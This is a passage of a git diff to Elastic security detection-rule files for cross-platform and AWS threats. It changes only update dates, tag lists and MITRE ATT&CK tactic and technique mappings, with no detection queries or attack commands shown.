+1,7 @@ [metadata] creation_date = "2025/12/31" maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/16" [rule] @@ -27,7 +27,7 @@ If you are using **Elastic Defend**, ensure host IP collection is enabled by fol [helper guide](https://www.elastic.co/docs/solutions/security/configure-elastic-defend/configure-data-volume-for-elastic-endpoint#host-fields). """ severity = "high" -tags = ["Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Tactic: Lateral Movement", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" @@ -111,15 +111,3 @@ The detection rule uses alert data to determine when multiple alerts from differ - Escalate the incident to the appropriate internal or external cybersecurity teams for further investigation and potential legal action if the attack is part of a larger campaign.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml b/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml index 4725b801ac1..56a10ffcee4 100644 --- a/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml +++ b/rules/cross-platform/multiple_alerts_email_elastic_defend_correlation.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/19" integration = ["endpoint", "checkpoint_email"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/15" [rule] author = ["Elastic"] @@ -18,7 +18,15 @@ name = "Elastic Defend and Email Alerts Correlation" risk_score = 73 rule_id = "c562a800-cf97-464e-9d6f-84db91e86e10" severity = "high" -tags = ["Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Tactic: Initial Access", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Check Point Harmony Email & Collaboration", "Domain: Email", "Domain: Endpoint"] +tags = [ + "Use Case: Threat Detection", + "Rule Type: Higher-Order Rule", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Check Point Harmony Email & Collaboration", + "Domain: Email", + "Domain: Endpoint" +] timestamp_override = "event.ingested" type = "esql" @@ -74,16 +82,3 @@ This rule correlates any Elastic Defend alert with an email security related ale - Restore the host from a known good backup if necessary, ensuring that the backup is free from compromise. - Monitor the host and network for any signs of re-infection or further suspicious activity, using enhanced logging and alerting based on the identified attack patterns. - Escalate the incident to the appropriate internal or external cybersecurity teams for further investigation and potential legal action if the attack is part of a larger campaign.""" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml b/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml index 5e2d9eb2fd5..03f1778d43d 100644 --- a/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml +++ b/rules/cross-platform/multiple_alerts_llm_compromised_user_triage.toml @@ -3,7 +3,7 @@ creation_date = "2026/02/03" maturity = "production" min_stack_comments = "ES|QL COMPLETION command requires Elastic Managed LLM (gp-llm-v2) available in 9.3.0+" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -73,7 +73,14 @@ following the [LLM connector documentation](https://www.elastic.co/docs/explore- and update the `inference_id` parameter in the query to reference your configured connector. """ severity = "critical" -tags = ["Domain: Identity", "Domain: LLM", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Tactic: Initial Access", "Resources: Investigation Guide", "Rule Type: Higher-Order Rule"] +tags = [ + "Domain: Identity", + "Domain: LLM", + "Use Case: Threat Detection", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Rule Type: Higher-Order Rule", +] timestamp_override = "event.ingested" type = "esql" @@ -152,15 +159,3 @@ from .alerts-security.* METADATA _id, _version, _index | keep user.name, user.id, user.email, host.name, message, event.reason, event.outcome, event.category, event.action, Esql.* ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml b/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml index 61bc47503c2..6d27f7fa239 100644 --- a/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml +++ b/rules/cross-platform/persistence_ssh_authorized_keys_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/22" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -54,7 +54,16 @@ SSH authorized_keys files are crucial for secure, password-less authentication, risk_score = 47 rule_id = "2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' @@ -95,6 +104,35 @@ reference = "https://attack.mitre.org/techniques/T1098/004/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + +[[rule.threat.technique]] +id = "T1563" +name = "Remote Service Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/" + +[[rule.threat.technique.subtechnique]] +id = "T1563.001" +name = "SSH Hijacking" +reference = "https://attack.mitre.org/techniques/T1563/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable"] diff --git a/rules/cross-platform/persistence_web_server_potential_command_injection.toml b/rules/cross-platform/persistence_web_server_potential_command_injection.toml index d85ff3962b0..e71c50e44c1 100644 --- a/rules/cross-platform/persistence_web_server_potential_command_injection.toml +++ b/rules/cross-platform/persistence_web_server_potential_command_injection.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] @@ -52,7 +52,21 @@ This rule flags web requests whose URLs embed command-execution payloads—inter risk_score = 21 rule_id = "f3ac6734-7e52-4a0d-90b7-6847bf4308f2" severity = "low" -tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"] +tags = [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Credential Access", + "Tactic: Command and Control", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -144,14 +158,19 @@ from logs-nginx.access-*, logs-apache.access-*, logs-apache_tomcat.access-*, log framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -161,7 +180,48 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.002" +name = "Vulnerability Scanning" +reference = "https://attack.mitre.org/techniques/T1595/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.003" +name = "Wordlist Scanning" +reference = "https://attack.mitre.org/techniques/T1595/003/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml index 34ef2593638..1aa962b8f7f 100644 --- a/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml +++ b/rules/cross-platform/privilege_escalation_echo_nopasswd_sudoers.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -19,7 +19,15 @@ references = ["https://www.elastic.co/security-labs/primer-on-persistence-mechan risk_score = 73 rule_id = "76152ca1-71d0-4003-9e37-0983e12832da" severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -61,38 +69,22 @@ The sudoers file is crucial in Unix-like systems, defining user permissions for - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if the threat has spread to other systems. - Implement additional logging and alerting for changes to the sudoers file and other critical configuration files to enhance detection of similar threats in the future.""" + [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.003" name = "Sudo and Sudo Caching" reference = "https://attack.mitre.org/techniques/T1548/003/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.003" -name = "Sudo and Sudo Caching" -reference = "https://attack.mitre.org/techniques/T1548/003/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml index 967af209153..0c3fbef2c2e 100644 --- a/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml +++ b/rules/cross-platform/privilege_escalation_setuid_setgid_bit_set_via_chmod.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -57,7 +57,15 @@ references = ["https://www.elastic.co/security-labs/primer-on-persistence-mechan risk_score = 21 rule_id = "8a1b0278-0f9a-487d-96bd-d4833298e87a" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -99,17 +107,7 @@ reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[[rule.threat.technique.subtechnique]] -id = "T1548.001" -name = "Setuid and Setgid" -reference = "https://attack.mitre.org/techniques/T1548/001/" - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/cross-platform/privilege_escalation_trap_execution.toml b/rules/cross-platform/privilege_escalation_trap_execution.toml index 2d7f9b35b02..d94587dd5b0 100644 --- a/rules/cross-platform/privilege_escalation_trap_execution.toml +++ b/rules/cross-platform/privilege_escalation_trap_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/24" integration = ["endpoint", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/12" [rule] author = ["Elastic"] @@ -49,7 +49,17 @@ This rule flags use of the shell built-in trap to bind commands to POSIX signals risk_score = 21 rule_id = "cf6995ec-32a9-4b2d-9340-f8e61acf3f4e" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -71,6 +81,6 @@ name = "Trap" reference = "https://attack.mitre.org/techniques/T1546/005/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml b/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml index 6f708721b17..a21ef09d5a0 100644 --- a/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml +++ b/rules/cross-platform/reconnaissance_web_server_discovery_or_fuzzing_activity.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] @@ -105,6 +105,11 @@ id = "T1595" name = "Active Scanning" reference = "https://attack.mitre.org/techniques/T1595/" +[[rule.threat.technique.subtechnique]] +id = "T1595.002" +name = "Vulnerability Scanning" +reference = "https://attack.mitre.org/techniques/T1595/002/" + [[rule.threat.technique.subtechnique]] id = "T1595.003" name = "Wordlist Scanning" diff --git a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml index a0d76d21725..6e1a850949f 100644 --- a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml +++ b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_logs.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/05" [rule] author = ["Elastic"] @@ -99,6 +99,11 @@ id = "T1595.002" name = "Vulnerability Scanning" reference = "https://attack.mitre.org/techniques/T1595/002/" +[[rule.threat.technique.subtechnique]] +id = "T1595.003" +name = "Wordlist Scanning" +reference = "https://attack.mitre.org/techniques/T1595/003/" + [rule.threat.tactic] id = "TA0043" name = "Reconnaissance" diff --git a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml index 0f3c8e22610..474e146dc74 100644 --- a/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml +++ b/rules/cross-platform/reconnaissance_web_server_unusual_spike_in_error_response_codes.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] @@ -117,6 +117,11 @@ id = "T1595.002" name = "Vulnerability Scanning" reference = "https://attack.mitre.org/techniques/T1595/002/" +[[rule.threat.technique.subtechnique]] +id = "T1595.003" +name = "Wordlist Scanning" +reference = "https://attack.mitre.org/techniques/T1595/003/" + [rule.threat.tactic] id = "TA0043" name = "Reconnaissance" diff --git a/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml b/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml index e2c8e39c56d..f98e838dc84 100644 --- a/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml +++ b/rules/cross-platform/reconnaissance_web_server_unusual_user_agents.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] @@ -50,7 +50,18 @@ This rule flags surges of web requests that advertise scanner or brute-force too risk_score = 21 rule_id = "a1b7ffa4-bf80-4bf1-86ad-c3f4dc718b35" severity = "low" -tags = ["Domain: Web", "Use Case: Threat Detection", "Tactic: Reconnaissance", "Data Source: Nginx", "Data Source: Apache", "Data Source: Apache Tomcat", "Data Source: IIS", "Data Source: Traefik", "Resources: Investigation Guide"] +tags = [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Reconnaissance", + "Tactic: Credential Access", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" query = ''' @@ -115,6 +126,11 @@ id = "T1595" name = "Active Scanning" reference = "https://attack.mitre.org/techniques/T1595/" +[[rule.threat.technique.subtechnique]] +id = "T1595.001" +name = "Scanning IP Blocks" +reference = "https://attack.mitre.org/techniques/T1595/001/" + [[rule.threat.technique.subtechnique]] id = "T1595.002" name = "Vulnerability Scanning" @@ -129,3 +145,16 @@ reference = "https://attack.mitre.org/techniques/T1595/003/" id = "TA0043" name = "Reconnaissance" reference = "https://attack.mitre.org/tactics/TA0043/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/aws/collection_cloudtrail_logging_created.toml b/rules/integrations/aws/collection_cloudtrail_logging_created.toml index 839ce6d42d9..21998af8115 100644 --- a/rules/integrations/aws/collection_cloudtrail_logging_created.toml +++ b/rules/integrations/aws/collection_cloudtrail_logging_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/10" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -69,7 +69,15 @@ references = [ risk_score = 21 rule_id = "594e0cbf-86cc-45aa-9ff7-ff27db27d3ed" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Cloudtrail", "Use Case: Log Auditing", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Cloudtrail", + "Use Case: Log Auditing", + "Tactic: Collection", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -83,21 +91,17 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1530" +name = "Data from Cloud Storage" +reference = "https://attack.mitre.org/techniques/T1530/" -[[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml b/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml index 8faabf103c2..d649ef077c5 100644 --- a/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml +++ b/rules/integrations/aws/collection_s3_unauthenticated_bucket_access_by_rare_source.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -92,7 +92,15 @@ risk_score = 47 rule_id = "59bf26c2-bcbe-11ef-a215-f661ea17fbce" setup = "S3 data events must be enabled in CloudTrail to capture the GetObject, PutObject, ListObjects, and DeleteObject actions. Ensure that the AWS CloudTrail service is configured to log data events for the S3 bucket you'd like to monitor." severity = "medium" -tags = ["Domain: Cloud", "Tactic: Collection", "Tactic: Discovery", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: Amazon S3", "Use Case: Asset Visibility", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: Amazon S3", + "Use Case: Asset Visibility", + "Resources: Investigation Guide", + "Tactic: Collection", +] timestamp_override = "event.ingested" type = "new_terms" @@ -113,42 +121,42 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" + [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1619" name = "Cloud Storage Object Discovery" reference = "https://attack.mitre.org/techniques/T1619/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1485" name = "Data Destruction" reference = "https://attack.mitre.org/techniques/T1485/" + [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml b/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml index 244fef8f9cb..7bf37ce9e83 100644 --- a/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml +++ b/rules/integrations/aws/credential_access_aws_getpassword_for_ec2_instance.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/10" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/06/04" [rule] author = ["Elastic"] @@ -95,16 +95,22 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" +[[rule.threat.technique.subtechnique]] +id = "T1552.005" +name = "Cloud Instance Metadata API" +reference = "https://attack.mitre.org/techniques/T1552/005/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.new_terms] field = "new_terms_fields" value = ["aws.cloudtrail.user_identity.session_context.session_issuer.arn"] diff --git a/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml b/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml index 5d27f5e2070..d134a095da1 100644 --- a/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml +++ b/rules/integrations/aws/credential_access_iam_user_addition_to_group.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/04" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -74,7 +74,15 @@ references = ["https://docs.aws.amazon.com/IAM/latest/APIReference/API_AddUserTo risk_score = 21 rule_id = "333de828-8190-4cf5-8d7c-7575846f6fe0" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -89,28 +97,23 @@ event.dataset: aws.cloudtrail and [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml b/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml index d744ecf6047..2fd99ea0bd8 100644 --- a/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml +++ b/rules/integrations/aws/credential_access_root_console_failure_brute_force.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/21" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -132,21 +132,17 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.001" -name = "Password Guessing" -reference = "https://attack.mitre.org/techniques/T1110/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.threshold] field = ["cloud.account.id"] value = 10 diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml index 30221b5bef0..f762db3aa20 100644 --- a/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml +++ b/rules/integrations/aws/defense_evasion_cloudtrail_logging_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/26" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -82,21 +82,22 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml b/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml index 1955e7dfa15..b81501f12d9 100644 --- a/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml +++ b/rules/integrations/aws/defense_evasion_cloudtrail_logging_suspended.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/10" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = 